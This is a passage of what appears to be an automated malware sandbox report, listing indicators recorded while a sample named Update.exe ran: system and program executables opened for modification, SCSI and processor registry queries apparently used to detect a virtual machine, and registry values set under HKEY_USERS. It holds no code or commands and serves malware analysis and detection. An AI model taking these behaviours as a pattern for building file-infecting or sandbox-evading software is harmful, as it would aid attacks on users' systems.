| File opened for modification | C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\SearchIndexer.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Mozilla Firefox\default-browser-agent.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\orbd.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\policytool.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\schemagen.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\mip.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zG.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javapackager.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\ielowutil.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\javaw.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jconsole.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\kinit.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\servertool.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\updater.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\rmic.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\iediagcmd.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\ieinstal.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\rmic.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\iexplore.exe | C:\Windows\System32\OpenSSH\ssh-agent.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\dotnet.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaws.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jabswitch.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ktab.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\orbd.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javac.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\ieinstal.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\kinit.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jjs.exe | C:\Windows\system32\spectrum.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\OpenSSH\ssh-agent.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\DtcInstall.log | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\DtcInstall.log | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\system32\vssvc.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe | C:\Windows\System32\msdtc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\TieringEngineService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\TieringEngineService.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\System32\SnippingTool.exe,-15052 = "Capture a portion of your screen so you can save, annotate, or share the image." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\odbcint.dll,-1694 = "ODBC Data Sources (64-bit)" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail" | C:\Windows\system32\fxssvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000 = "Remote Desktop Connection" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051 = "Snipping Tool" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\SearchFilterHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\regedit.exe,-16 = "Registry Editor" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
